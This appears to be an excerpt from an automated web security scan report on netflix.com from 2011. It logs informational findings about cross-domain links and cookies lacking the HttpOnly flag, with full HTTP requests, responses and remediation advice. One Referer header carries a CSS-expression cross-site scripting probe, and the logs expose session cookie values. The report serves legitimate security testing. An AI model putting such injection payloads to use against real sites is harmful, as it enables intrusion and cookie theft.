href="https://www.netflix.com/"><img src="http://cdn-0.nflximg.com/us/layout/signup/950/header/netflix_logo.gif" height="55" border="0" alt="Netflix" title="Netflix"> </a>...[SNIP]... <a href="http://www.netflix.com/GiftPurchase?lnktrk=gsTrkIdBuy"><img src="http://cdn-0.nflximg.com/us/layout/gift/oct2008/button_blue_buy.gif" border="0"> </a>...[SNIP]... <li class="bo"><a href="http://www.netflixprize.com"> Netflix Prize</a>...[SNIP]...
4.3. http://www.netflix.com/Movie/Iron-Man-2/70111470
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Movie/Iron-Man-2/70111470
Issue detail
The page was loaded from a URL containing a query string:http://www.netflix.com/Movie/Iron-Man-2/70111470?trkid=813619 The response contains the following link to another domain:http://cdn-0.nflximg.com/us/labels/1px.gif
Request
GET /Movie/Iron-Man-2/70111470?trkid=813619 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/SubGenreList/Action_Adventure552fe%22style%3d%22x%3aexpression(alert(1))%221a6e8429755/296/Comic_Books_and_Superheroes/642 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; lastHitTime=1313440473093; nflxsid=112.1313440473093; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440473097~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDA0NzMwOTc6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313415273099; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 403 Forbidden Date: Mon, 15 Aug 2011 20:40:14 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Last-Modified: Wed, 09 Mar 2011 22:33:19 GMT Accept-Ranges: bytes Vary: Accept-Encoding Cache-Control: private Content-Length: 2444 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Netflix Site Err...[SNIP]... <a href="http://www.netflix.com/Default"><img src="http://cdn-0.nflximg.com/us/labels/1px.gif" height=40 width=120 alt="Netflix - Discover Movies You'll Love" Title="Netflix - Discover Movies You'll Love" border=0> </a>...[SNIP]...
4.4. http://www.netflix.com/NetflixReadyDevices
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/NetflixReadyDevices
Issue detail
The page was loaded from a URL containing a query string:http://www.netflix.com/NetflixReadyDevices?lnkce=nrd-o&lnkctr=nmf_nfrd&trkid=496634 The response contains the following links to other domains:http://cdn-0.nflximg.com/us/icons/nficon.ico http://cdn-0.nflximg.com/us/layout/signup/950/header/netflix_logo.gif http://cdn-0.nflximg.com/us/pages/signup/nrd/start_one_month_free_trial.png http://cdn-0.nflximg.com/us/pages/signup/nrd/us_stream_one_month_free.jpg http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/devices/Xbox_360_list.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/devices/ps3-console-controller.jpg http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/devices/wii_list.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/partners/logo_ps3.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/partners/logo_wii.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/partners/logo_xbox.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_blu_ray.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_dvr.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_game_consoles.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_handhelds.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_hdtv.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_home_theater.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_streaming_players.png http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/nrd_badge.png http://www.netflixprize.com/ http://www.nintendo.com/consumer/systems/wii/en_na/channelsShop.jsp
Request
GET /NetflixReadyDevices?lnkce=nrd-o&lnkctr=nmf_nfrd&trkid=496634 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440265208; nflxsid=112.1313440265209; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440265212~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjUyMTM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313415065215; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:31:41 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:31:42 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313440302429; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440301383~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Set-Cookie: nflxsid=112.1313440302430; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440302433~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMDI0MzQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415102436; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Vary: Accept-Encoding Content-Length: 18784 <!DOCTYPE HTML> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript">var RoundTripIn...[SNIP]... <meta name="save" content="history"><link rel="shortcut icon" href="http://cdn-0.nflximg.com/us/icons/nficon.ico"> <link rel="canonical" href="http://www.netflix.com/NetflixReadyDevices">...[SNIP]... <a href="https://www.netflix.com/"><img src="http://cdn-0.nflximg.com/us/layout/signup/950/header/netflix_logo.gif" height="55" border="0" alt="Netflix" title="Netflix"> </a>...[SNIP]... <a href="http://www.netflix.com/Signup"><img class="transp" src="http://cdn-0.nflximg.com/us/pages/signup/nrd/start_one_month_free_trial.png" border="0"> </a>...[SNIP]... <div class="fam"> <img class="transp" src="http://cdn-0.nflximg.com/us/pages/signup/nrd/us_stream_one_month_free.jpg" border="0"> </div>...[SNIP]... <span>Look for this logo on the box: <img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/nrd_badge.png" alt="Instant Streaming Ready Badge" class="nrd-badge"> </span>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=Game+Consoles" title="Game Consoles" class="selected menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_game_consoles.png" alt="Game Consoles" class="transp"> Game Consoles</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=Streaming+Players" title="Streaming Players" class="menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_streaming_players.png" alt="Streaming Players" class="transp"> Streaming Players</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=Blu-ray+Players" title="Blu-ray Players" class="menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_blu_ray.png" alt="Blu-ray Players" class="transp"> Blu-ray Players</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=HDTV" title="HDTV" class="menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_hdtv.png" alt="HDTV" class="transp"> HDTV</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=DVRs" title="DVRs" class="menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_dvr.png" alt="DVRs" class="transp"> DVRs</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=Mobile+Devices" title="Mobile Devices" class="menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_handhelds.png" alt="Mobile Devices" class="transp"> Mobile Devices</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevices?cid=Home+Theater" title="Home Theater" class="menu-item"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20100921/categories/cat_home_theater.png" alt="Home Theater" class="transp"> Home Theater</a>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevicesDetails?lnkce=nrd-d&pdid=105&lnkctr=nrd-d-n-105-playstation3system&trkid=1473817" class="nrd-img nrd-col"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/devices/ps3-console-controller.jpg" alt="PlayStation..3 System"> </a>...[SNIP]... <span class="nrd-logo nrd-col"> <img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/partners/logo_ps3.png" alt="PlayStation"> </span>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevicesDetails?lnkce=nrd-d&pdid=284&lnkctr=nrd-d-n-284-wiiconsole&trkid=3323493" class="nrd-img nrd-col"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/devices/wii_list.png" alt="Wii console"> </a>...[SNIP]... cial gameplay that the whole family can enjoy. All Wii consoles can connect to the Internet---instantly watch TV shows and movies streamed via your Wii console with a Netflix unlimited membership, use <a href="http://www.nintendo.com/consumer/systems/wii/en_na/channelsShop.jsp#about_points"> Wii Points</a>...[SNIP]... <span class="nrd-logo nrd-col"> <img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/partners/logo_wii.png" alt="Wii"> </span>...[SNIP]... <a href="http://www.netflix.com/NetflixReadyDevicesDetails?lnkce=nrd-d&pdid=5&lnkctr=nrd-d-n-5-xbox360&trkid=1473815" class="nrd-img nrd-col"><img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/devices/Xbox_360_list.png" alt="Xbox 360"> </a>...[SNIP]... <span class="nrd-logo nrd-col"> <img src="http://cdn-0.nflximg.com/us/pages/wn/nfrd/20081110/partners/logo_xbox.png" alt="Xbox"> </span>...[SNIP]... <li class="bo"><a href="http://www.netflixprize.com"> Netflix Prize</a>...[SNIP]...
4.5. http://www.netflix.com/entryTrap.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/entryTrap.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.netflix.com/entryTrap.jsp?why=hyperactive The response contains the following links to other domains:http://cdn.nflximg.com/us/icons/nficon.ico http://cdn.nflximg.com/us/pages/entryTrap/enabled.gif http://cdn.nflximg.com/us/pages/entryTrap/whoops.gif
Request
GET /entryTrap.jsp?why=hyperactive HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/AllGenresList User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440035342; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440035342
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:16 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Cache-Control: private Content-Length: 6812 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="ROBOTS" content="NOODP"> <meta name="S...[SNIP]... <meta name="save" content="history"><link rel="shortcut icon" href="http://cdn.nflximg.com/us/icons/nficon.ico"/> <meta name="description" content="Watch TV Shows & Movies Online or Streaming to your TV with Xbox, Wii, PS3, iPad & many other devices. For only $7.99 a month. Start your Free Trial now.">...[SNIP]... <div class="page-content" id="page-content"> <img src="http://cdn.nflximg.com/us/pages/entryTrap/whoops.gif" height="21" width="724" vspace="2"/> <h4 class="sect_head">...[SNIP]... <a href="http://www.netflix.com/Default?lnkctr=entryTrap"><img src="http://cdn.nflximg.com/us/pages/entryTrap/enabled.gif" border="0" height="22" width="203" /> </a>...[SNIP]...
5. Cookie without HttpOnly flag set
previous
next
There are 13 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
5.1. http://www.netflix.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313439904276; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:04 GMT; Path=/ nflxsid=112.1313439904277; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://netflix.mediaroom.com/index.php?s=43&item=402 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; vstCnt=1~1~1313414669406; lastHitTime=1313439890544; nflxsid=112.1313439890544; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTA1NDg6OnRjdz0xJmNxcz06"; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:25:03 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: https://www.netflix.com/Set-Cookie: lastHitTime=1313439904276; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:04 GMT; Path=/ Set-Cookie: nflxsid=112.1313439904277; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
5.2. http://www.netflix.com/Affiliates
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Affiliates
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440025205; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440024056~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ nflxsid=112.1313440025205; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025209~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjUyMDk6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:05 GMT; Path=/ vstCnt=1~1~1313414825217; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Affiliates HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440020419; nflxsid=112.1313440020419; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440020423~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjA0MjM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414820425; miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; __qca=P0-1419279816-1313440086339
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:05 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:05 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440025205; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440024056~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ Set-Cookie: nflxsid=112.1313440025205; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:05 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025209~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjUyMDk6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:05 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414825217; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ Vary: Accept-Encoding Content-Length: 18107 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440025205, serverBeforeHtml: 1313440025217 };</script> <meta h...[SNIP]...
5.3. http://www.netflix.com/AllGenresList
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/AllGenresList
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440012398; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012239~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ nflxsid=112.1313440012398; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012402~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMTI0MDI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:26:52 GMT; Path=/ vstCnt=1~1~1313414812405; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AllGenresList HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; lastHitTime=1313440001609; nflxsid=112.1313440001609; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440001613~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMDE2MTM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414801616; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:26:51 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:26:52 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440012398; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012239~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ Set-Cookie: nflxsid=112.1313440012398; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:26:52 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012402~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMTI0MDI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:26:52 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414812405; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ Vary: Accept-Encoding Content-Length: 79911 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440012398, 